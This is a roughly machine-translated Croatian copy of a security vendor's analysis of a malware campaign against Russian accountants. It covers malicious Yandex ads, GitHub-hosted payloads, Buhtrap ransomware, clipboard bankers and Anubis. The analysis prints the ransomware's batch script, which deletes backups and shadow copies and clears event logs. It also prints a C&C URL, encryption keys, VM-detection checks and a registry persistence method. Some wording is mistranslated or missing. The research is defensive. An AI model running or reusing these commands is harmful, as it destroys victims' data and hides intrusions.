Kako biste ciljali računovođe u kibernetičkom napadu, možete koristiti radne dokumente koje pretražuju na internetu. To je otprilike ono što je jedna cyber grupa radila u proteklih nekoliko mjeseci, distribuirajući poznata stražnja vrata. и , kao i enkriptore i softver za krađu kriptovaluta. Većina ciljeva nalazi se u Rusiji. Napad je izveden postavljanjem zlonamjernog oglašavanja na Yandex.Direct. Potencijalne žrtve usmjeravane su na web stranicu na kojoj se od njih tražilo da preuzmu zlonamjernu datoteku prerušenu u predložak dokumenta. Yandex je uklonio zlonamjerno oglašavanje nakon našeg upozorenja.
Izvorni kod Buhtrapa je u prošlosti procurio online tako da ga svatko može koristiti. Nemamo informacija o dostupnosti RTM koda.
U ovom postu ćemo vam reći kako su napadači distribuirali zlonamjerni softver koristeći Yandex.Direct i hostirali ga na GitHubu. Post će završiti tehničkom analizom zlonamjernog softvera.
Buhtrap i RTM ponovno su u poslu
Mehanizam širenja i žrtve
Različiti tereti isporučeni žrtvama dijele zajednički mehanizam širenja. Sve zlonamjerne datoteke koje su stvorili napadači smještene su u dva različita GitHub repozitorija.
Obično je spremište sadržavalo jednu zlonamjernu datoteku za preuzimanje, koja se često mijenjala. Budući da vam GitHub omogućuje pregled povijesti promjena u repozitoriju, možemo vidjeti koji je malware distribuiran tijekom određenog razdoblja. Kako bi se žrtva uvjerila da preuzme zlonamjernu datoteku, korištena je web stranica blanki-shabloni24[.]ru, prikazana na gornjoj slici.
Dizajn stranice i svi nazivi malicioznih datoteka slijede jedinstveni koncept - obrasci, predlošci, ugovori, uzorci itd. S obzirom da su softveri Buhtrap i RTM već korišteni u napadima na računovođe u prošlosti, pretpostavili smo da je strategija u novoj kampanji je ista. Pitanje je samo kako je žrtva došla do web stranice napadača.
infekcija
Najmanje nekoliko potencijalnih žrtava koje su završile na ovoj stranici privuklo je zlonamjerno oglašavanje. Ispod je primjer URL-a:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kao što možete vidjeti na linku, banner je objavljen na legitimnom računovodstvenom forumu bb.f2[.]kz. Važno je napomenuti da su se banneri pojavljivali na različitim stranicama, svi su imali isti ID kampanje (blanki_rsya), a većina se odnosila na usluge računovodstva ili pravne pomoći. URL pokazuje da je potencijalna žrtva upotrijebila zahtjev "preuzmi obrazac fakture", što podržava našu hipotezu o ciljanim napadima. Ispod su stranice na kojima su se banneri pojavili i odgovarajući upiti za pretraživanje.
- preuzmi obrazac računa – bb.f2[.]kz
- uzorak ugovora - Ipopen[.]ru
- uzorak žalbe na prijavu - 77metrov[.]ru
- obrazac ugovora - blank-dogovor-kupli-prodazhi[.]ru
- uzorak sudske peticije - zen.yandex[.]ru
- uzorak žalbe - yurday[.]ru
- ogledni obrasci ugovora – Regforum[.]ru
- oblik ugovora – assistentus[.]ru
- uzorak ugovora o stanu – napravah[.]com
- uzorci pravnih ugovora - avito[.]ru
Stranica blanki-shabloni24[.]ru možda je konfigurirana da prođe jednostavnu vizualnu procjenu. Obično se oglas koji upućuje na web mjesto profesionalnog izgleda s vezom na GitHub ne čini kao nešto očito loše. Osim toga, napadači su učitavali zlonamjerne datoteke u repozitorij samo na ograničeno razdoblje, vjerojatno tijekom kampanje. Većinu vremena GitHub repozitorij sadržavao je praznu zip arhivu ili praznu EXE datoteku. Stoga bi napadači mogli distribuirati oglašavanje putem Yandex.Directa na stranicama koje su najvjerojatnije posjećivali računovođe koji su dolazili kao odgovor na određene upite pretraživanja.
Zatim, pogledajmo različite nosivosti raspoređene na ovaj način.
Analiza nosivosti
Kronologija distribucije
Zlonamjerna kampanja započela je krajem listopada 2018. i aktivna je u vrijeme pisanja. Budući da je cijeli repozitorij bio javno dostupan na GitHubu, sastavili smo točnu vremensku crtu distribucije šest različitih obitelji zlonamjernog softvera (vidi sliku u nastavku). Dodali smo redak koji pokazuje kada je veza bannera otkrivena, prema mjerenju ESET-ove telemetrije, za usporedbu s poviješću git-a. Kao što vidite, ovo je u dobroj korelaciji s dostupnošću korisnih podataka na GitHubu. Nepodudarnost krajem veljače može se objasniti činjenicom da nismo imali dio povijesti promjena jer je repozitorij uklonjen s GitHuba prije nego što smo ga uspjeli dobiti u cijelosti.
Slika 1. Kronologija distribucije malwarea.
Certifikati za potpisivanje koda
Kampanja je koristila više certifikata. Neke je potpisalo više od jedne obitelji zlonamjernih programa, što dodatno ukazuje na to da su različiti uzorci pripadali istoj kampanji. Unatoč dostupnosti privatnog ključa, operateri nisu sustavno potpisivali binarne datoteke i nisu koristili ključ za sve uzorke. Krajem veljače 2019. napadači su počeli stvarati nevažeće potpise pomoću certifikata u vlasništvu Googlea za koji nisu imali privatni ključ.
Svi certifikati uključeni u kampanju i obitelji malwarea koje potpisuju navedeni su u tablici u nastavku.
Također smo koristili ove certifikate za potpisivanje koda za uspostavljanje veza s drugim obiteljima zlonamjernog softvera. Za većinu certifikata nismo pronašli uzorke koji nisu distribuirani putem GitHub repozitorija. Međutim, certifikat TOV “MARIYA” korišten je za potpisivanje zlonamjernog softvera koji pripada botnetu , adware i rudari. Malo je vjerojatno da je ovaj zlonamjerni softver povezan s ovom kampanjom. Najvjerojatnije je certifikat kupljen na darknetu.
Win32/Filecoder.Buhtrap
Prva komponenta koja nam je privukla pozornost je novootkriveni Win32/Filecoder.Buhtrap. Ovo je Delphi binarna datoteka koja se ponekad pakira. Uglavnom je distribuiran u razdoblju od veljače do ožujka 2019. Ponaša se kako i dolikuje ransomware programu - pretražuje lokalne diskove i mrežne mape te kriptira otkrivene datoteke. Ne treba mu internetska veza da bi bio ugrožen jer ne kontaktira poslužitelj za slanje ključeva za šifriranje. Umjesto toga, dodaje "token" na kraj poruke o otkupnini i predlaže korištenje e-pošte ili Bitmessagea za kontaktiranje operatera.
Kako bi šifrirao što više osjetljivih resursa, Filecoder.Buhtrap pokreće nit dizajniranu za isključivanje ključnog softvera koji može imati otvorene rukovatelje datotekama koje sadrže vrijedne informacije koje bi mogle ometati enkripciju. Ciljani procesi su uglavnom sustavi za upravljanje bazama podataka (DBMS). Osim toga, Filecoder.Buhtrap briše log datoteke i sigurnosne kopije kako bi otežao oporavak podataka. Da biste to učinili, pokrenite skupnu skriptu u nastavku.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap koristi legitimnu internetsku uslugu IP Logger dizajniranu za prikupljanje informacija o posjetiteljima web stranice. Ovo je namijenjeno praćenju žrtava ransomwarea, što je odgovornost naredbenog retka:
mshta.exe "javascript:document.write('');"
Datoteke za enkripciju odabiru se ako ne odgovaraju trima popisima izuzetaka. Prvo, datoteke sa sljedećim ekstenzijama nisu šifrirane: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys i .šišmiš. Drugo, isključene su sve datoteke za koje puni put sadrži nizove direktorija s donjeg popisa.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Treće, određeni nazivi datoteka također su isključeni iz enkripcije, među njima i naziv datoteke poruke o otkupnini. Popis je prikazan u nastavku. Očito, sve ove iznimke imaju za cilj održati stroj u radu, ali uz minimalnu ispravnost na cesti.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Shema šifriranja datoteka
Nakon što se izvrši, zlonamjerni softver generira 512-bitni par RSA ključeva. Privatni eksponent (d) i modul (n) zatim se šifriraju tvrdo kodiranim 2048-bitnim javnim ključem (javni eksponent i modul), upakiranim u zlib i kodiranim base64. Kod koji je odgovoran za to prikazan je na slici 2.
Slika 2. Rezultat Hex-Rays dekompilacije procesa generiranja 512-bitnog RSA para ključeva.
Ispod je primjer običnog teksta s generiranim privatnim ključem, koji je token priložen poruci o otkupnini.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Javni ključ napadača naveden je u nastavku.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Datoteke su šifrirane pomoću AES-128-CBC s 256-bitnim ključem. Za svaku šifriranu datoteku generira se novi ključ i novi inicijalizacijski vektor. Podaci o ključu dodaju se na kraj šifrirane datoteke. Razmotrimo format šifrirane datoteke.
Šifrirane datoteke imaju sljedeće zaglavlje:
Podaci izvorne datoteke s dodatkom VEGA čarobne vrijednosti šifrirani su na prvih 0x5000 bajtova. Sve informacije o dešifriranju priložene su datoteci sa sljedećom strukturom:
- Oznaka veličine datoteke sadrži oznaku koja pokazuje je li datoteka veća od 0x5000 bajtova
— AES ključ blob = ZlibCompress(RSAEncrypt(AES ključ + IV, javni ključ generiranog para ključeva RSA))
- RSA ključ blob = ZlibCompress(RSAEncrypt(generirani RSA privatni ključ, tvrdo kodirani RSA javni ključ))
Win32/ClipBanker
Win32/ClipBanker je komponenta koja se s prekidima distribuirala od kraja listopada do početka prosinca 2018. Njegova uloga je nadgledanje sadržaja međuspremnika, traži adrese novčanika kriptovaluta. Nakon što odredi ciljnu adresu novčanika, ClipBanker je zamjenjuje adresom za koju se vjeruje da pripada operaterima. Uzorci koje smo ispitali nisu bili niti u kutiji niti zamagljeni. Jedini mehanizam koji se koristi za maskiranje ponašanja je enkripcija niza. Adrese novčanika operatera su šifrirane pomoću RC4. Ciljane kriptovalute su Bitcoin, Bitcoin cash, Dogecoin, Ethereum i Ripple.
Tijekom razdoblja kada se zlonamjerni softver širio na Bitcoin novčanike napadača, mala je količina poslana VTS-u, što baca sumnju na uspjeh kampanje. Osim toga, nema dokaza koji bi sugerirali da su te transakcije uopće bile povezane s ClipBankerom.
Win32/RTM
Win32/RTM komponenta distribuirana je nekoliko dana početkom ožujka 2019. RTM je trojanski bankar napisan u Delphiju, namijenjen sustavima udaljenog bankarstva. Istraživači ESET-a objavili su 2017 ovog programa, opis je još uvijek relevantan. U siječnju 2019. Palo Alto Networks također je objavio .
Buhtrap utovarivač
Neko je vrijeme na GitHubu bio dostupan downloader koji nije bio sličan prethodnim Buhtrap alatima. Okreće se prema https://94.100.18[.]67/RSS.php?<some_id> da dobije sljedeću fazu i učita je izravno u memoriju. Možemo razlikovati dva ponašanja koda druge faze. U prvom URL-u, RSS.php je izravno prošao Buhtrap backdoor - ovaj backdoor je vrlo sličan onom dostupnom nakon što je izvorni kod procurio.
Zanimljivo, vidimo nekoliko kampanja s Buhtrap backdoorom, a navodno ih vode različiti operateri. U ovom slučaju, glavna razlika je u tome što se backdoor učitava izravno u memoriju i ne koristi uobičajenu shemu s procesom postavljanja DLL-a o kojem smo govorili . Osim toga, operateri su promijenili ključ RC4 koji se koristi za šifriranje mrežnog prometa na C&C poslužitelj. U većini kampanja koje smo vidjeli, operateri se nisu trudili promijeniti ovaj ključ.
Drugo, složenije ponašanje bilo je da je RSS.php URL proslijeđen drugom učitavaču. Implementirao je neke maske, poput ponovne izgradnje tablice dinamičkog uvoza. Svrha bootloadera je kontaktirati C&C poslužitelj [.]com/api/F27F84EDA4D13B15/2, pošaljite zapise i pričekajte odgovor. Obrađuje odgovor kao blob, učitava ga u memoriju i izvršava. Korisni teret koji smo vidjeli kako izvršava ovaj utovarivač bio je isti Buhtrap backdoor, ali možda postoje i druge komponente.
Android/Spy.Banker
Zanimljivo, u GitHub repozitoriju pronađena je i komponenta za Android. U glavnoj poslovnici bio je samo jedan dan – 1. Osim objave na GitHubu, ESET-ova telemetrija ne pronalazi dokaze o distribuciji ovog zlonamjernog softvera.
Komponenta je hostirana kao paket Android aplikacija (APK). Jako je zamagljen. Zlonamjerno ponašanje skriveno je u šifriranom JAR-u koji se nalazi u APK-u. Šifrirano je pomoću RC4 pomoću ovog ključa:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Isti ključ i algoritam koriste se za šifriranje nizova. JAR se nalazi u APK_ROOT + image/files. Prva 4 bajta datoteke sadrže duljinu šifriranog JAR-a, koja počinje odmah nakon polja duljine.
Nakon što smo dešifrirali datoteku, otkrili smo da je to bio Anubis - prije bankar za Android. Zlonamjerni softver ima sljedeće značajke:
- snimanje mikrofona
- snimanje zaslona
- dobivanje GPS koordinata
- keylogger
- šifriranje podataka uređaja i traženje otkupnine
- slanje neželjene pošte
Zanimljivo je da je bankar koristio Twitter kao rezervni komunikacijski kanal za dobivanje drugog C&C servera. Uzorak koji smo analizirali koristio je @JonesTrader račun, ali je u vrijeme analize već bio blokiran.
Bankar sadrži popis ciljanih aplikacija na Android uređaju. Duži je od popisa dobivenog u studiji Sophos. Popis uključuje mnoge bankarske aplikacije, programe za online kupnju kao što su Amazon i eBay te usluge kriptovaluta.
MSIL/ClipBanker.IH
Posljednja komponenta koja je distribuirana u sklopu ove kampanje bila je .NET Windows izvršna datoteka koja se pojavila u ožujku 2019. Većina proučavanih verzija bila je pakirana s ConfuserEx v1.0.0. Kao i ClipBanker, ova komponenta koristi međuspremnik. Cilj mu je širok izbor kriptovaluta, kao i ponuda na Steamu. Uz to, koristi uslugu IP Logger za krađu Bitcoin privatnog WIF ključa.
Mehanizmi zaštite
Uz prednosti koje ConfuserEx pruža u sprječavanju otklanjanja pogrešaka, izbacivanja i petljanja, komponenta uključuje mogućnost otkrivanja antivirusnih proizvoda i virtualnih strojeva.
Kako bi provjerio radi li na virtualnom računalu, zlonamjerni softver koristi ugrađenu Windows WMI naredbenu liniju (WMIC) za traženje BIOS informacija, naime:
wmic bios
Zatim program analizira izlaz naredbe i traži ključne riječi: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Kako bi otkrio antivirusne proizvode, zlonamjerni softver šalje zahtjev Windows Management Instrumentation (WMI) u Windows Security Center koristeći ManagementObjectSearcher API kao što je prikazano u nastavku. Nakon dekodiranja iz base64 poziv izgleda ovako:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Slika 3. Proces identificiranja antivirusnih proizvoda.
Osim toga, zlonamjerni softver provjerava je li , alat za zaštitu od napada međuspremnika i, ako je pokrenut, obustavlja sve niti u tom procesu, čime onemogućuje zaštitu.
Upornost
Verzija zlonamjernog softvera koju smo proučavali kopira se u nju %APPDATA%googleupdater.exe i postavlja atribut "hidden" za google imenik. Zatim mijenja vrijednost SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell u Windows registru i dodaje stazu updater.exe. Na taj način će se zlonamjerni softver pokrenuti svaki put kada se korisnik prijavi.
Zlonamjerno ponašanje
Kao i ClipBanker, zlonamjerni softver prati sadržaj međuspremnika i traži adrese novčanika za kriptovalute, a kada ih pronađe, zamjenjuje ih jednom od adresa operatera. Ispod je popis ciljnih adresa na temelju onoga što se nalazi u kodu.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Za svaku vrstu adrese postoji odgovarajući regularni izraz. Vrijednost STEAM_URL koristi se za napad na Steam sustav, kao što se može vidjeti iz regularnog izraza koji se koristi za definiranje u međuspremniku:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Eksfiltracijski kanal
Osim zamjene adresa u međuspremniku, zlonamjerni softver cilja privatne WIF ključeve Bitcoin, Bitcoin Core i Electrum Bitcoin novčanika. Program koristi plogger.org kao kanal za eksfiltraciju za dobivanje WIF privatnog ključa. Da bi to učinili, operateri dodaju podatke privatnog ključa u HTTP zaglavlje korisničkog agenta, kao što je prikazano u nastavku.
Slika 4. IP Logger konzola s izlaznim podacima.
Operateri nisu koristili iplogger.org za eksfiltraciju novčanika. Vjerojatno su pribjegli drugoj metodi zbog ograničenja od 255 znakova u polju User-Agentprikazan u IP Logger web sučelju. U uzorcima koje smo proučavali, drugi izlazni poslužitelj bio je pohranjen u varijabli okruženja DiscordWebHook. Iznenađujuće, ova varijabla okoline nije dodijeljena nigdje u kodu. To sugerira da je zlonamjerni softver još uvijek u razvoju i da je varijabla dodijeljena testnom stroju operatera.
Postoji još jedan znak da je program u razvoju. Binarna datoteka uključuje dva URL-a iplogger.org i oba se postavljaju upiti kada dođe do eksfiltracije podataka. U zahtjevu za jedan od ovih URL-ova, vrijednosti u polju Referer prethodi "DEV /". Također smo pronašli verziju koja nije zapakirana pomoću ConfuserExa, primatelj za ovaj URL zove se DevFeedbackUrl. Na temelju naziva varijable okruženja, vjerujemo da operateri planiraju koristiti legitimnu uslugu Discord i njezin sustav za presretanje weba za krađu novčanika kriptovalute.
Zaključak
Ova kampanja je primjer korištenja legitimnih usluga oglašavanja u cyber napadima. Shema je usmjerena na ruske organizacije, ali ne bi nas iznenadilo vidjeti takav napad korištenjem usluga koje nisu ruske. Kako bi izbjegli kompromis, korisnici moraju biti sigurni u ugled izvora softvera koji preuzimaju.
Potpuni popis pokazatelja kompromisa i atributa MITER ATT&CK dostupan je na .
Izvor: www.habr.com